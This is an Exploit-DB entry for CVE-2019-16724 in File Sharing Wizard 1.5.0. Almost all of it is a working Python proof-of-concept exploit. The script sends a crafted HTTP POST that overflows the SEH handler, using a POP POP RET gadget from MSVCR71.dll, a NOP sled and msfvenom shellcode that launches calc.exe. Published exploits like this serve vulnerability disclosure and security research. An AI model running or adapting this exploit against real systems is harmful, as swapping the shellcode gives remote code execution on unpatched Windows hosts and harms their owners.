File Sharing Wizard 1.5.0 - POST SEH Overflow

EDB-ID:

47412


Author:

x00pwn

Type:

remote


Platform:

Windows

Date:

2019-09-24


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

import socket
from struct import *

# Exploit Title: File sharing wizard 'post' remote SEH overflow
# Date: 9/23/2019
# Exploit Author: x00pwn
# Software Link: https://file-sharing-wizard.soft112.com/
# Version: 1.5.0
# Tested on: Windows 7
# CVE : CVE-2019-16724

# File-sharing-wizard-seh

#----------------------------------------------#
# Bad characters: \x00        #
# SEH value:  0x909032EB  (JMP short)    #
# NSEH value: 0x7c38a67f (POP POP RET)  #
#----------------------------------------------#

#  Assigned CVE ID : CVE-2019-16724

victim_host = "10.0.0.17"
victim_port = 80

# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode EXITFUNC=seh
shellcode =  ""
shellcode += "\xd9\xc7\xd9\x74\x24\xf4\xba\x65\x1d\x84\xe1\x5f"
shellcode += "\x29\xc9\xb1\x31\x31\x57\x18\x03\x57\x18\x83\xef"
shellcode += "\x99\xff\x71\x1d\x89\x82\x7a\xde\x49\xe3\xf3\x3b"
shellcode += "\x78\x23\x67\x4f\x2a\x93\xe3\x1d\xc6\x58\xa1\xb5"
shellcode += "\x5d\x2c\x6e\xb9\xd6\x9b\x48\xf4\xe7\xb0\xa9\x97"
shellcode += "\x6b\xcb\xfd\x77\x52\x04\xf0\x76\x93\x79\xf9\x2b"
shellcode += "\x4c\xf5\xac\xdb\xf9\x43\x6d\x57\xb1\x42\xf5\x84"
shellcode += "\x01\x64\xd4\x1a\x1a\x3f\xf6\x9d\xcf\x4b\xbf\x85"
shellcode += "\x0c\x71\x09\x3d\xe6\x0d\x88\x97\x37\xed\x27\xd6"
shellcode += "\xf8\x1c\x39\x1e\x3e\xff\x4c\x56\x3d\x82\x56\xad"
shellcode += "\x3c\x58\xd2\x36\xe6\x2b\x44\x93\x17\xff\x13\x50"
shellcode += "\x1b\xb4\x50\x3e\x3f\x4b\xb4\x34\x3b\xc0\x3b\x9b"
shellcode += "\xca\x92\x1f\x3f\x97\x41\x01\x66\x7d\x27\x3e\x78"
shellcode += "\xde\x98\x9a\xf2\xf2\xcd\x96\x58\x98\x10\x24\xe7"
shellcode += "\xee\x13\x36\xe8\x5e\x7c\x07\x63\x31\xfb\x98\xa6"
shellcode += "\x76\xfd\x69\x7b\x62\x6a\xd0\xee\xcf\xf6\xe3\xc4"
shellcode += "\x13\x0f\x60\xed\xeb\xf4\x78\x84\xee\xb1\x3e\x74"
shellcode += "\x82\xaa\xaa\x7a\x31\xca\xfe\x18\xd4\x58\x62\xf1"
shellcode += "\x73\xd9\x01\x0d"

nseh = pack ('<I',0x909032EB) # Short jump forward 32 places into NOP sled
seh = pack('I',0x7c38a67f) # POP POP RET

# 0x7c38a67f : pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_READ} [MSVCR71.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files (x86)\File Sharing Wizard\bin\MSVCR71.dll)

exploit_payload  = "A" * 1040
exploit_payload += nseh # JMP short
exploit_payload += seh # POPPOPRET
exploit_payload += "\x90" * 100 # NOPSLED
exploit_payload += shellcode # popping calc.exe
exploit_payload += "D" *(5000 - len(exploit_payload))

payload_header  = "POST " + exploit_payload
payload_header +=" HTTP/1.0\r\n\r\n"

# overflowed SEH handler - 42386942 : [*] Exact match at offset 1044

try:
print("""
--------------------------------
CVE-2019-16724 proof of concept
File sharing wizard SEH overflow
--------------------------------
""")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("[x] Setting up a socket connection")
expl.connect((victim_host, victim_port))
print("[x] Establishing a connection to the victim")
expl.send(payload_header)
print("[x] Sending ")
except:
print("[!] Error establishing a connection")
print("[!] Error sending exploit")